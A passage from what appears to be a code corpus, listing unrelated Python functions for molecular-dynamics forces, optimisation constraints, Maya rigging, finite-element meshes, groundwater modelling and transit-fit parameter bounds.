Initially empty list of indices\n for ci in product(range(sc),repeat=3): # Triple loop over cells\n mask = np.all(c==ci,axis=1) # Mask identifies atoms in this cell\n kc.append(k_array[mask]) # Copy atom indices into array, add to list\n\n for ci1, kci in enumerate(kc): # Loop over i-cells, getting atom indices as an array\n ci = np.unravel_index(ci1,(sc,sc,sc)) # Get i-cell triple-indices\n\n # Set up correct neighbour cell indices\n if ci[1]==sc-1: # i-cell is in the top layer\n dd = d # Standard list copied, including extra 3 cells\n dd[5:,0] = dd[5:,0] - shift # All those looking up need adjustment in the x direction\n else:\n dd = d[:-3,:] # Last three extra cells are not needed; shift is not needed\n\n for dj in dd: # Loop over neighbouring j-cells\n cj = ci + dj # Compute neighbour j-cell triple-indices\n cj1 = np.ravel_multi_index(cj,(sc,sc,sc),mode='wrap') # Convert to single-index\n kcj = kc[cj1] # Get indices of atoms in j-cell as an array\n\n for i, ki in enumerate(kci): # Loop over individual atoms in i-cell\n j0 = i+1 if cj1==ci1 else 0 # Only look upwards if i-cell==j-cell\n if j0 >= kcj.size: # Handles (redundantly) empty j-cell and the case \n continue # where j-cell==i-cell and i is last atom\n\n for kj in kcj[j0:]: # Loop over individual atoms in j-cell\n rij = r[ki,:]-r[kj,:] # Separation vector\n rij[0] = rij[0] - np.rint(rij[1])*strain # Extra correction in box=1 units\n rij = rij - np.rint(rij) # Periodic boundary conditions in box=1 units\n rij_sq = np.sum(rij**2) # Squared separation\n\n if rij_sq < r_cut_box_sq: # Check within cutoff\n rij_sq = rij_sq * box_sq # Now in sigma=1 units\n rij = rij * box # Now in sigma=1 units\n sr2 = 1.0 / rij_sq # (sigma/rij)**2\n ovr = sr2 > sr2_ovr # Overlap if too close\n sr6 = sr2 ** 3\n sr12 = sr6 ** 2\n pot = sr12 - sr6 # LJ potential (cut but not shifted)\n vir = pot + sr12 # LJ virial\n pot = pot + 0.25 # WCA LJ potential (cut-and-shifted)\n lap = ( 22.0*sr12 - 5.0*sr6 ) * sr2 # LJ Laplacian\n fij = rij * vir * sr2 # LJ forces\n pyx = 
rij[1]*fij[0] # Off-diagonal element of pressure tensor\n total = total + PotentialType ( pot=pot, vir=vir, pyx=pyx, lap=lap, ovr=ovr )\n f[ki,:] = f[ki,:] + fij\n f[kj,:] = f[kj,:] - fij\n\n # Multiply results by numerical factors\n f = f * 24.0 # 24*epsilon\n total.pot = total.pot * 4.0 # 4*epsilon\n total.vir = total.vir * 24.0 / 3.0 # 24*epsilon and divide virial by 3\n total.pyx = total.pyx * 24.0 # 24*epsilon\n total.lap = total.lap * 24.0 * 2.0 # 24*epsilon and factor 2 for ij and ji\n \n return total, f", "def createConstraint(*argv):", "def build_constraints_boundaries(self):\n\n # Trapezoidal and Hermite-Simpson methods can't compute\n # defects at the last node contrary to pseudospectral methods\n coll_method = self.options['tr_method'] in [\n 'trapezoidal', 'hermite-simpson']\n n_nodes = self.problem.prm['n_nodes'] - \\\n 1 if coll_method else self.problem.prm['n_nodes']\n\n # Defects lower and upper boundaries\n defects_low = np.zeros(\n self.problem.prm['n_states'] * n_nodes)\n defects_upp = np.zeros(\n self.problem.prm['n_states'] * n_nodes)\n\n # Path lower and upper boundaries\n path_low = np.hstack([self.problem.low_bnd.path]\n * (self.problem.prm['n_nodes']))\n path_upp = np.hstack([self.problem.upp_bnd.path]\n * (self.problem.prm['n_nodes']))\n\n # Events lower and upper boundaries\n event_low = self.problem.low_bnd.event\n event_upp = self.problem.upp_bnd.event\n\n # Assembly of the lower and upper boundaries vectors\n low = np.concatenate((defects_low, path_low, event_low))\n upp = np.concatenate((defects_upp, path_upp, event_upp))\n\n return low, upp", "def makeBinaryChains():\n\t\n\t# retrieve the binding partner specifications\n\t(maxsize,types) = getTypes()\n\t\n\t# Do some basic argument checking for this model\n\tif (len(types) < 2):\n\t\tprint \"Number of defined types must equal two for binary chain calculations.\"\n\t\treturn\n\tif (maxsize == 0):\n\t\tprint \"Must specify a valid maximum number for one or more components.\"\n\t\treturn\n\n\tallChains = []\n\tnewChainsA = [[]]\n\tnewChainsB = []\n\t\n\ttypeA = types[0]\n\ttypeB = types[1]\n\t\n\t# start the chain with a single type A component\n\taddComponent(newChainsA[0],typeA,0,0)\n\n\tdepth = 0\n\tfor n in range(maxsize):\n\t\tdepth+=1\n\t\t\n\t\t# go through all the chains created last iteration and append B components\n\t\tnewChainsB = []\n\t\tfor thisChain in newChainsA:\n\n\t\t\t# get a list of new available sites in the provided chain\n\t\t\t# by setting depth -1, we will only add to components added last round\n\t\t\topenSites = makeSiteList(thisChain,typeB,depth-1)\n\t\t\t\n\t\t\t# make all the descendants from the current chain and append them to the pool\n\t\t\tif (n == 0) and (typeA['sym']): #if the starting binder is symmetric, no need to start chains at all its sites\n\t\t\t\tnewChainsB = newChainsB + fillSites(openSites,thisChain,typeB,-1)\n\t\t\telse:\n\t\t\t\tnewChainsB = newChainsB + fillSites(openSites,thisChain,typeB,depth)\n\t\t\n\t\tprint('n:'+str(n)+', '+str(len(newChainsB))+ ' chains created at depth '+str(depth))\n\t\t\n\t\tallChains = allChains + newChainsB\n\t\t\n\t\tdepth+=1\n\t\t\n\t\t# add an additional component to all the previously modified chains\n\t\tnewChainsA = []\n\t\tfor thisChain in newChainsB:\n\n\t\t\topenSites = makeSiteList(thisChain,typeA,depth-1)\n\t\t\tnewChainsA = newChainsA + fillSites(openSites,thisChain,typeA,depth)\n\t\t\t\n\t\tprint('n:'+str(n)+', '+str(len(newChainsA))+ ' chains created at depth '+str(depth))\n\t\t\n\t\tallChains = allChains + 
newChainsA\n\n\treturn allChains", "def constraints(self, x):\n pass", "def removeSkeletalConstraints(self):\n\n # get the joints created by this module and remove the constraints\n joints = self.returnCreatedJoints\n\n # create mover name\n networkNode = self.returnNetworkNode\n baseName = cmds.getAttr(networkNode + \".baseName\")\n\n for joint in joints:\n if cmds.objExists(joint + \"_mover_offset\"):\n cmds.select(joint)\n cmds.delete(constraints=True)\n\n else:\n jointBaseName = joint\n if self.name != baseName:\n nameData = self.name.split(baseName)\n\n if nameData[0] != \"\":\n jointBaseName = jointBaseName.partition(nameData[0])[2]\n if nameData[1] != \"\":\n jointBaseName = jointBaseName.partition(nameData[1])[0]\n\n if cmds.objExists(self.name + \"_\" + jointBaseName + \"_mover_offset\"):\n cmds.select(joint)\n cmds.delete(constraints=True)", "def _constraints_task_spread(self):\n # encourage scheduling a chunk for every 24 hours\n diag = util.blockdiag(self.num_timeslots, incr=tutil.SLOTS_PER_DAY)\n slots = diag.shape[0]\n\n def rule(model, p, j):\n \"\"\"\n For spread-activated tasks, this rule is used to encourage\n spreading the chunks out on multiple days.\n\n More precisely:\n S[i,j] = whether task j is assigned on day i\n\n Maximizing sum_i S[i,j] encourages spreading out the task chunks\n \"\"\"\n den = sum(diag[p, :])\n ind_i = model.timeslots\n total = sum(diag[p, i] * (\n model.A[i, j] + 2 * model.A2[i, j] + 3 * model.A3[i, j] + 4 *\n model.A4[i, j]) for i in ind_i)\n total /= den\n # Desired: S[i,j] = ceil(total)\n # Desired: S[i,j] = 0 if total <= 0; otherwise, S[i,j] = 1\n return -EPS, model.S[p, j] - total, 1 - EPS\n\n self.model.constrain_spread0 = Constraint(self.model.dayslots,\n self.model.tasks, rule=rule)\n\n def rule(model):\n den = self.num_tasks * slots\n num = 20\n weights = np.ones((7, self.num_tasks))\n for j in range(self.num_tasks):\n weights[:, j] = self.task_spread[j]\n total = summation(weights, model.S) / den * num\n return model.S_total == total\n\n self.model.constrain_spread1 = Constraint(rule=rule)", "def create_3d_patch(model,orgin,size,N,setname='default'):\n \n N = map(int,N)\n # create the coordinates and connectivity based on one\n bxyz,bcube = block3d(orgin,size,N)\n \n # add node to model starting with current highest node seq\n nn = int(model.node(bxyz))\n update_bcube = bcube + int(nn)\n \n pelemset = model.element(update_bcube,setname)\n \n \n nx = N[0] + 1\n ny = N[1] + 1\n nz = N[2] + 1\n \n \n nodeline = {}\n\n nodeline['1'] = [nn + 1]\n nodeline['2'] = [nn + 1 + ny*nz*(nx-1)]\n nodeline['3'] = [nn + 1 + ny*nz*(nx-1) + (ny-1)*nz]\n nodeline['4'] = [nn + 1 + nz*(ny-1)]\n nodeline['5'] = [nodeline['1'][0] + (nz-1)]\n nodeline['6'] = [nodeline['2'][0] + (nz-1)]\n nodeline['7'] = [nodeline['3'][0] + (nz-1)]\n nodeline['8'] = [nodeline['4'][0] + (nz-1)]\n \n nodeline['1-2'] = range(nodeline['1'][0],nodeline['2'][0]+1,ny*nz)\n nodeline['2-3'] = range(nodeline['2'][0],nodeline['3'][0]+1,nz)\n nodeline['3-4'] = range(nodeline['4'][0],nodeline['3'][0]+1,ny*nz)\n nodeline['1-4'] = range(nodeline['1'][0],nodeline['4'][0]+1,nz)\n\n nodeline['5-6'] = range(nodeline['5'][0],nodeline['6'][0]+1,ny*nz)\n nodeline['6-7'] = range(nodeline['6'][0],nodeline['7'][0]+1,nz)\n nodeline['7-8'] = range(nodeline['8'][0],nodeline['7'][0]+1,ny*nz)\n nodeline['5-8'] = range(nodeline['5'][0],nodeline['8'][0]+1,nz)\n \n nodeline['1-5'] = range(nodeline['1'][0],nodeline['5'][0]+1,1)\n nodeline['4-8'] = range(nodeline['4'][0],nodeline['8'][0]+1,1)\n nodeline['2-6'] 
= range(nodeline['2'][0],nodeline['6'][0]+1,1)\n nodeline['3-7'] = range(nodeline['3'][0],nodeline['7'][0]+1,1)\n \n nodeline['1-2-3-4'] = []\n nodeline['5-6-7-8'] = []\n nodeline['1-2-6-5'] = []\n nodeline['4-3-7-8'] = []\n nodeline['1-4-8-5'] = []\n nodeline['2-3-7-6'] = []\n \n for i in range(0,nx):\n for j in nodeline['1-4']:\n nodeline['1-2-3-4'].append(j + i*ny*nz)\n for j in nodeline['5-8']:\n nodeline['5-6-7-8'].append(j + i*ny*nz) \n \n for j in nodeline['1-5']:\n nodeline['1-2-6-5'].append(j + i*ny*nz) \n for j in nodeline['4-8']:\n nodeline['4-3-7-8'].append(j + i*ny*nz)\n \n for i in range(0,ny):\n for j in nodeline['1-5']:\n nodeline['1-4-8-5'].append(j + i*nz)\n for j in nodeline['2-6']:\n nodeline['2-3-7-6'].append(j + i*nz)\n #\n for key in nodeline:\n nodesetname = '-'.join([setname , key])\n model.nodeset(nodesetname,{'nodelist':nodeline[key]})\n\n return model", "def construct_network(self):\n r = 0\n n = self.nbr_0_splxs\n for k in range(n):\n self.splxs.append((0, (0, k)))\n self.nbr_splxs += 1\n r, edge = self.find_next_edge(r)\n # this while loop finds the new edge to treat and add it to the 1-splx list and then finds out if a 2-splx is created\n while edge != (-1, -1):\n # Add the new edge\n self.one_splxs.append((edge, self.nbr_splxs))\n self.splxs.append((1, self.nbr_1_splxs))\n self.nbr_1_splxs += 1\n self.nbr_splxs += 1\n self.dist_appearance.append(r)\n a, b = edge\n # find out if a 2-splx has been created\n for i in range(self.nbr_1_splxs - 1):\n c, d = self.one_splxs[i][0]\n if d == a:\n for j in range(i + 1, self.nbr_1_splxs - 1):\n e, f = self.one_splxs[j][0]\n if e == c and f == b:\n self.two_splxs.append((self.nbr_1_splxs - 1, i, j))\n self.splxs.append((2, self.nbr_2_splxs))\n self.nbr_2_splxs += 1\n self.nbr_splxs += 1\n self.dist_appearance.append(r)\n # find the next edge to treat\n r, edge = self.find_next_edge(r)\n print(\"Network created\")\n return ()", "def __init__(self, model, line, segments = None, influence = None, \r\n strength = 1, variables = [], priors=[]):\r\n\r\n import numpy as np\r\n from scipy.interpolate import interp1d\r\n import copy\r\n \r\n self.model = model\r\n model.elementlist.append(self)\r\n \r\n self.variables = variables\r\n self.priors = priors\r\n \r\n # ---------------------------------------------------------------------\r\n # Subdivide the provided no flow boundary into #segments pieces\r\n \r\n self.line_raw = copy.copy(line)\r\n \r\n if segments is None:\r\n \r\n self.segments = line.shape[0]-1\r\n \r\n else:\r\n self.segments = segments\r\n \r\n if self.segments < self.line_raw.shape[0]-1:\r\n \r\n raise Exception('Number of segments '+str(self.segments)+\" mustn't be smaller than number of line points \"+str(line.shape[0])+'.')\r\n \r\n if self.segments > self.line_raw.shape[0]:\r\n \r\n # Subdivide the line\r\n self.line = self.subdivide_line(line,self.segments)\r\n self.line_c = copy.copy(self.line[:,0] + 1j*self.line[:,1])\r\n else:\r\n \r\n self.line = self.line_raw.copy()\r\n self.line_c = self.line[:,0] + 1j*self.line[:,1]\r\n \r\n # Also get the normal vector components to each segment\r\n self.line_nvec = self.line[:,1] - 1j*self.line[:,0]\r\n self.line_nvec = self.line_nvec/np.abs(self.line_nvec)\r\n\r\n # --------------------------------------------------------------------- \r\n \r\n \r\n \r\n \r\n self.strength = np.ones(self.segments)*strength\r\n \r\n if influence is None:\r\n self.influence = self.model.domain_radius*2\r\n else:\r\n self.influence = influence\r\n \r\n \r\n self.Zi = []\r\n 
self.offset_outside = []\r\n self.L = []\r\n self.zc = []\r\n self.segment_nvec = []\r\n self.head_target = []\r\n \r\n for seg in range(self.segments):\r\n \r\n self.L += [np.abs(self.line_c[seg+1] - self.line_c[seg])]\r\n \r\n influence_pt = (self.line_c[seg+1]-self.line_c[seg])*self.influence/self.L[seg] + self.line_c[seg]\r\n Z = (2*influence_pt-(self.line_c[seg]+self.line_c[seg+1]))/(self.line_c[seg+1]-self.line_c[seg])\r\n self.Zi += [copy.copy(Z)]\r\n \r\n self.zc += [(self.line_c[seg]+self.line_c[seg+1])/2]\r\n \r\n # Calculate the normal vector to this segment\r\n self.segment_nvec += [(self.line_c[seg]-self.line_c[seg+1])]\r\n self.segment_nvec[-1]= [np.imag(self.segment_nvec[-1])-1j*np.real(self.segment_nvec[-1])]\r\n \r\n part1 = np.nan_to_num((Z+1)*np.log(Z+1))\r\n part2 = np.nan_to_num((Z-1)*np.log(Z-1))\r\n self.offset_outside += [self.L[seg] / (4*np.pi) * (part1 - part2)]\r\n \r\n # Convert list of segment centers to array\r\n self.zc = np.asarray(self.zc)\r\n \r\n \r\n # Check if the prior matches the number of parameters\r\n if len(self.priors) != len(self.variables):\r\n raise Exception('Number of priors must match number of unknown variables. Number of priors: '+str(self.priors)+' / Number of unknown variables: '+str(len(self.variables)))\r\n \r\n # Go through all elements\r\n if len(self.variables) > 0:\r\n # There are some model variables specified\r\n for idx,var in enumerate(self.variables):\r\n self.model.num_params += 1\r\n exec(\"self.model.params += [self.%s]\" % var)\r\n self.model.priors += [self.priors[idx]]\r\n self.model.variables += [var]\r\n if 'name' in list(self.priors[idx].keys()):\r\n self.model.param_names += [self.priors[idx]['name']] \r\n else: \r\n self.model.param_names += ['unknown']", "def __init__(self, model, line, segments = None,head_target = 0,\r\n variables = [], priors=[]):\r\n\r\n import numpy as np\r\n from scipy.interpolate import interp1d\r\n import copy\r\n \r\n # Append this element to the specified model\r\n self.model = model\r\n model.elementlist.append(self)\r\n model.linear_solver = True\r\n\r\n # ---------------------------------------------------------------------\r\n # Subdivide the provided no flow boundary into segments pieces\r\n \r\n # Complexify the line, if it wasn't already complex\r\n line = self.complexify(line)\r\n \r\n # The subdivision algorith requires the line coordinates as a real N-by-2 matrix\r\n line = np.column_stack((\r\n np.real(line)[:,np.newaxis],\r\n np.imag(line)[:,np.newaxis]))\r\n \r\n self.line_raw = copy.copy(line)\r\n if segments is None:\r\n self.segments = line.shape[0]-1\r\n else:\r\n self.segments = segments\r\n \r\n if self.segments < self.line_raw.shape[0]-1:\r\n raise Exception('Prescribed number of line segments '+str(self.segments)+\" mustn't be smaller than base number of segments \"+str(line.shape[0]-1)+'.')\r\n \r\n if self.segments > self.line_raw.shape[0]-1:\r\n \r\n # Subdivide the line\r\n self.line = self.subdivide_line(line,self.segments)\r\n self.line_c = self.line[:,0] + 1j*self.line[:,1]\r\n \r\n else:\r\n \r\n self.line = self.line_raw.copy()\r\n self.line_c = self.line[:,0] + 1j*self.line[:,1]\r\n \r\n # Also get the normal vector components to each segment\r\n self.line_nvec = self.line[:,1] - 1j*self.line[:,0]\r\n self.line_nvec = self.line_nvec/np.abs(self.line_nvec)\r\n\r\n # ---------------------------------------------------------------------\r\n \r\n # Get strength parameters for each vertex\r\n self.strength = np.ones(self.segments)\r\n \r\n \r\n self.zc = []\r\n 
self.segment_nvec = []\r\n self.L = []\r\n \r\n for seg in range(self.segments):\r\n \r\n self.zc += [(self.line_c[seg]+self.line_c[seg+1])/2]\r\n \r\n # Calculate the normal vector to this segment\r\n self.segment_nvec += [(self.line_c[seg]-self.line_c[seg+1])]\r\n self.segment_nvec[-1]= [np.imag(self.segment_nvec[-1])-1j*np.real(self.segment_nvec[-1])]\r\n \r\n self.L += [np.abs(self.line_c[seg+1] - self.line_c[seg])]\r\n \r\n self.zc = np.asarray(self.zc)\r\n \r\n # Extract target variables\r\n self.variables = variables\r\n self.priors = priors\r\n \r\n self.L = np.asarray(self.L)\r\n \r\n \r\n # Check if the prior matches the number of parameters\r\n if len(self.priors) != len(self.variables):\r\n raise Exception('Number of priors must match number of unknown variables. Number of priors: '+str(self.priors)+' / Number of unknown variables: '+str(len(self.variables)))\r\n \r\n # Go through all elements\r\n if len(self.variables) > 0:\r\n # There are some model variables specified\r\n for idx,var in enumerate(self.variables):\r\n self.model.num_params += 1\r\n exec(\"self.model.params += [self.%s]\" % var)\r\n self.model.priors += [self.priors[idx]]\r\n self.model.variables += [var]\r\n if 'name' in list(self.priors[idx].keys()):\r\n self.model.param_names += [self.priors[idx]['name']] \r\n else: \r\n self.model.param_names += ['unknown']", "def generate(pts):\n cmds.polyCreateFacet(name=\"shirt\", p=points)\n cmds.polyTriangulate()\n cmds.polySubdivideFacet(dv=SUBDIVISIONS)\n cmds.polyTriangulate()", "def _auto_influence(self, mod, rigid, pair_blend):\n\n constraint = rigid.sibling(type=\"rdConstraint\")\n\n # This is fine (but what does it mean? :O )\n if not constraint:\n return\n\n def bake_joint_orient(mat, orient):\n \"\"\"Bake jointOrient values\n\n Such that keyframes can be made without\n taking those into account. E.g. a joint with 0 rotate\n but 45 degrees of jointOrient should only require a key\n with 0 degrees.\n\n \"\"\"\n\n assert isinstance(mat, cmdx.om.MMatrix)\n assert isinstance(orient, cmdx.om.MQuaternion)\n\n mat_tm = cmdx.om.MTransformationMatrix(mat)\n new_quat = mat_tm.rotation(asQuaternion=True) * orient\n mat_tm.setRotation(new_quat)\n\n return mat_tm.asMatrix()\n\n transform = rigid.parent()\n\n joint_orient = self._cache[(transform, \"jointOrient\")]\n\n # pairBlend directly feeds into the drive matrix\n compose = mod.create_node(\"composeMatrix\", name=\"composePairBlend\")\n mod.connect(pair_blend[\"inTranslate1\"], compose[\"inputTranslate\"])\n mod.connect(pair_blend[\"inRotate1\"], compose[\"inputRotate\"])\n\n # A drive is relative the parent frame, but the pairblend is relative\n # the parent Maya transform. 
In case these are not the same, we'll\n # map the pairblend into the space of the parent frame.\n parent_rigid = constraint[\"parentRigid\"].connection()\n\n # Could be connected to a scene too\n if parent_rigid.type() != \"rdRigid\":\n return\n\n relative = mod.create_node(\"multMatrix\", name=\"makeRelative\")\n\n # From this space..\n parent_transform_matrix = rigid[\"inputParentInverseMatrix\"].asMatrix()\n parent_transform_matrix = parent_transform_matrix.inverse()\n\n # To this space..\n parent_rigid_matrix = parent_rigid[\"cachedRestMatrix\"].asMatrix()\n parent_rigid_matrix = parent_rigid_matrix.inverse()\n\n total_matrix = parent_transform_matrix * parent_rigid_matrix\n total_matrix = bake_joint_orient(total_matrix, joint_orient)\n\n mod.connect(compose[\"outputMatrix\"], relative[\"matrixIn\"][0])\n mod.set_attr(relative[\"matrixIn\"][1], total_matrix)\n\n mod.connect(relative[\"matrixSum\"], constraint[\"driveMatrix\"])\n\n # Keep channel box clean\n mod.set_attr(compose[\"isHistoricallyInteresting\"], False)\n mod.set_attr(relative[\"isHistoricallyInteresting\"], False)", "def cut_bonds_strain(xy, NL, KL, BM0, bstrain):\n NP, NN = np.shape(NL)\n BL = NL2BL(NL, KL)\n bL0 = BM2bL(NL, BM0, BL)\n BLtrim, bL0trim = cut_bonds_strain_BL(BL, xy, bL0, bstrain)\n KL = BL2KL(BLtrim, NL)\n # i2cut = (np.sqrt((xy[BL[:,0],0]-xy[BL[:,1],0])**2+(xy[BL[:,0],1]-xy[BL[:,1],1])**2) - bL0) < bstrain*bL0\n return KL, BLtrim, bL0trim", "def geminal_constraints(self, signatures, structure):\n\n # Identify all geminal pairs of signatures\n\n geminals = {(i, i.geminal) for i in signatures if i.geminal}\n\n # Iterate over geminals pairs of signatures\n\n for i, j in geminals:\n\n # Iterate over the domain of i\n\n for i_methyl in self.assignment_variables[i]:\n\n clause = [-self.assignment_variables[i][i_methyl]]\n\n # Should i be assigned to i_methyl, the clause we add\n # can only be satisfied if j is assigned to the geminal pair\n # of i_methyl\n\n for j_methyl in self.assignment_variables[j]:\n if i_methyl.geminal(j_methyl):\n clause.append(self.assignment_variables[j][j_methyl])\n\n # Add this clause to the formula\n self.add_clause(clause)", "def setup(self, proportion=False, maxmin=False):\n bounds = {}\n epsilons = {}\n\n # Maximize for super and minimize for Subinterval\n if maxmin:\n prob = pulp.LpProblem('SuperInterval LP', pulp.LpMaximize)\n else:\n prob = pulp.LpProblem('Max Subinterval LP', pulp.LpMinimize)\n\n # NOTE: Our LP requires each event to occur within a finite interval.\n # If the input LP does not have finite interval specified for all events, we want to set the setMakespan to MAX_FLOAT (infinity) so the LP works\n #\n # We do not want to run minimal network first because we are going to modify the contingent edges in LP, while some constraints in minimal network are obtained through contingent edges\n #\n # There might be better way to deal with this problem.\n # ##\n for (i, j) in self.stnu.edges():\n weight = self.stnu.get_edge_weight(i, j)\n if weight == float('inf'):\n self.stnu.update_edge_weight(i, j, MAX_FLOAT)\n\n # Store Original STN edges and objective variables for easy access. 
Not part of LP yet\n\n for i in self.stnu.nodes():\n bounds[(i, '+')] = pulp.LpVariable('t_%i_hi'%i, lowBound=0,\n upBound=self.stnu.get_edge_weight(0, i))\n\n lowbound = 0 if self.stnu.get_edge_weight(i, 0) == float('inf') else\\\n -self.stnu.get_edge_weight(i, 0)\n\n bounds[(i,'-')] = pulp.LpVariable('t_%i_lo'%i, lowBound=lowbound, upBound=None)\n\n self.add_constraint(bounds[(i, '-')] <= bounds[(i, '+')], prob)\n\n if i == 0:\n self.add_constraint(bounds[(i, '-')] == 0, prob)\n self.add_constraint(bounds[(i, '+')] == 0, prob)\n\n if i not in self.contingent_timepoints:\n self.add_constraint(bounds[(i, '-')] == bounds[(i, '+')], prob)\n\n if proportion:\n return (bounds, epsilons, prob)\n\n for (i, j) in self.constraints:\n if (i, j) in self.contingent_constraints:\n\n epsilons[(j, '+')] = pulp.LpVariable('eps_%i_hi' % j, lowBound=0, upBound=None)\n\n epsilons[(j, '-')] = pulp.LpVariable('eps_%i_lo' % j, lowBound=0, upBound=None)\n\n self.add_constraint(bounds[(j, '+')]-bounds[(i, '+')] ==\n self.stnu.get_edge_weight(i, j) - epsilons[(j,'+')], prob)\n self.add_constraint(bounds[(j, '-')]-bounds[(i, '-')] ==\n -self.stnu.get_edge_weight(j, i) + epsilons[(j, '-')], prob)\n\n else:\n # NOTE: We need to handle the infinite weight edges. Otherwise the LP would be infeasible\n upbound = MAX_FLOAT if self.stnu.get_edge_weight(i, j) == float('inf') \\\n else self.stnu.get_edge_weight(i, j)\n\n lowbound = MAX_FLOAT if self.stnu.get_edge_weight(j, i) == float('inf') \\\n else self.stnu.get_edge_weight(j, i)\n\n self.add_constraint(bounds[(j, '+')]-bounds[(i, '-')] <= upbound, prob)\n self.add_constraint(bounds[(i, '+')]-bounds[(j, '-')] <= lowbound, prob)\n\n return (bounds, epsilons, prob)", "def skeleton_buildDuplicateChain(self,sourceJoints = None, modifier = 'rig', connectToModule = False, connectAs = 'rigJoints', connectToSource = None, singleMode = False, cgmType = None, indices = [],blockNames=False):\n _str_func = 'skeleton_buildDuplicateChain'\n \n \n if indices:\n log.debug(\"|{0}| >> Indices arg: {1}\".format(_str_func, indices)) \n l_buffer = []\n for i in indices:\n l_buffer.append(sourceJoints[i])\n sourceJoints = l_buffer \n \n ml_source = cgmMeta.validateObjListArg(sourceJoints,mayaType=['joint'],noneValid=False)\n \n if connectToModule:\n #mRigNull = self.moduleTarget.rigNull\n \n #Get our segment joints\n if singleMode:\n l_jointsExist = connectToModule.getMessage(connectAs)\n else:\n l_jointsExist = connectToModule.msgList_get(connectAs,asMeta = False, cull = True)\n \n if l_jointsExist:\n log.debug(\"|{0}| >> Deleting existing {1} chain\".format(_str_func, modifier)) \n mc.delete(l_jointsExist)\n\n l_joints = mc.duplicate([i_jnt.mNode for i_jnt in ml_source],po=True,ic=True,rc=True)\n \n ml_joints = cgmMeta.validateObjListArg(l_joints,'cgmObject',setClass=True)\n \n if blockNames:\n l_names = skeleton_getNameDicts(self,False,len(l_joints)) \n else:\n l_names = []\n \n for i,mJnt in enumerate(ml_joints):\n if blockNames:\n _d_tmp = l_names[i]\n log.debug(\"|{0}| >> blockName dict {1} | {2}\".format(_str_func, i,_d_tmp)) \n for a in ['cgmIterator','cgmName']:\n if _d_tmp.get(a):\n mJnt.addAttr(a, str(_d_tmp.get(a)),attrType='string',lock=True)\n\n if modifier is not None:\n #l_names[i]['cgmTypeModifier'] = modifier\n mJnt.addAttr('cgmTypeModifier', modifier,attrType='string',lock=True)\n \n if cgmType is False:\n ATTR.delete(mJnt.mNode,'cgmType')\n elif cgmType:\n mJnt.addAttr('cgmType', cgmType,attrType='string',lock=True)\n \n #l_joints[i] = mJnt.mNode\n if connectToSource:\n 
mJnt.connectChildNode(ml_source[i].mNode,'sourceJoint',\"{0}Joint\".format(connectToSource))#Connect\n \n if mJnt.hasAttr('scaleJoint'):\n if mJnt.scaleJoint in ml_skinJoints:\n int_index = ml_source.index(mJnt.scaleJoint)\n mJnt.connectChildNode(ml_source[int_index],'scaleJoint','sourceJoint')#Connect\n\n #Name loop\n ml_joints[0].parent = False\n for i,mJnt in enumerate(ml_joints):\n #mJnt.rename(NAMETOOLS.returnCombinedNameFromDict(l_names[i]))\n mJnt.doName()\t\n \n if connectToModule:\n if singleMode:\n connectToModule.connectChildNode(ml_joints[0],connectAs,'rigNull')\n else:\n connectToModule.msgList_connect(connectAs, ml_joints,'rigNull')#connect\t\n log.debug(ml_joints)\n return ml_joints", "def make_bounds(coeffs_tuple, fix_coeffs, t=None, fix_coeffs_channels = None, normal = True,\n gaussian_priors = False, prior_params = None, coeffs_dict = None):\n\n if normal:\n if fix_coeffs_channels != None:\n fittable_coeffs_labels = [ key for key in coeffs_tuple if key not in fix_coeffs and key not in fix_coeffs_channels]\n else:\n fittable_coeffs_labels = [ key for key in coeffs_tuple if key not in fix_coeffs]\n\n bounds = [[-np.inf]*(len(fittable_coeffs_labels)), [np.inf]*(len(fittable_coeffs_labels))]\n\n if 't_secondary' in fittable_coeffs_labels:\n ind = np.where(np.array(fittable_coeffs_labels) == 't_secondary')\n ind = ind[0][0]\n bounds[0][ind], bounds[1][ind] = t[0], t[-1]\n elif 't0' in fittable_coeffs_labels:\n ind = np.where(np.array(fittable_coeffs_labels) == 't0')\n ind = ind[0][0]\n bounds[0][ind], bounds[1][ind] = t[0], t[-1]\n if 'rp' in fittable_coeffs_labels:\n ind = np.where(np.array(fittable_coeffs_labels) == 'rp')\n ind = ind[0][0]\n bounds[0][ind], bounds[1][ind] = 0., 1.\n if 'fp' in fittable_coeffs_labels:\n ind = np.where(np.array(fittable_coeffs_labels) == 'fp')\n ind = ind[0][0]\n bounds[0][ind], bounds[1][ind] = 0., 1.\n if 'a' in fittable_coeffs_labels:\n ind = np.where(np.array(fittable_coeffs_labels) == 'a')\n ind = ind[0][0]\n bounds[0][ind]= 0.\n if 'inc' in fittable_coeffs_labels:\n ind = np.where(np.array(fittable_coeffs_labels) == 'inc')\n ind = ind[0][0]\n bounds[0][ind], bounds[1][ind] = 0., 180.\n if 'ecc' in fittable_coeffs_labels:\n ind = np.where(np.array(fittable_coeffs_labels) == 'ecc')\n ind = ind[0][0]\n bounds[0][ind], bounds[1][ind] = 0., 1.\n if 'w' in fittable_coeffs_labels:\n ind = np.where(np.array(fittable_coeffs_labels) == 'w')\n ind = ind[0][0]\n bounds[0][ind], bounds[1][ind] = 0., 360.\n\n if gaussian_priors:\n for param in prior_params:\n ind = np.where(np.array(fittable_coeffs_labels) == param)[0][0]\n bounds[0][ind] = coeffs_dict[param] - coeffs_dict['{}_err'.format(param)]\n bounds[1][ind] = coeffs_dict[param] + coeffs_dict['{}_err'.format(param)]\n\n return bounds\n\n else:\n fittable_coeffs_labels = [ key for key in coeffs_tuple if key in fix_coeffs_channels]\n\n bounds = [[-np.inf]*(len(fittable_coeffs_labels)), [np.inf]*(len(fittable_coeffs_labels))]\n\n if 't_secondary' in fittable_coeffs_labels:\n ind = np.where(np.array(fittable_coeffs_labels) == 't_secondary')\n ind = ind[0][0]\n bounds[0][ind], bounds[1][ind] = t[0], t[-1]\n elif 't0' in fittable_coeffs_labels:\n ind = np.where(np.array(fittable_coeffs_labels) == 't0')\n ind = ind[0][0]\n bounds[0][ind], bounds[1][ind] = t[0], t[-1]\n if 'rp' in fittable_coeffs_labels:\n ind = np.where(np.array(fittable_coeffs_labels) == 'rp')\n ind = ind[0][0]\n bounds[0][ind], bounds[1][ind] = 0., 1.\n if 'fp' in fittable_coeffs_labels:\n ind = 
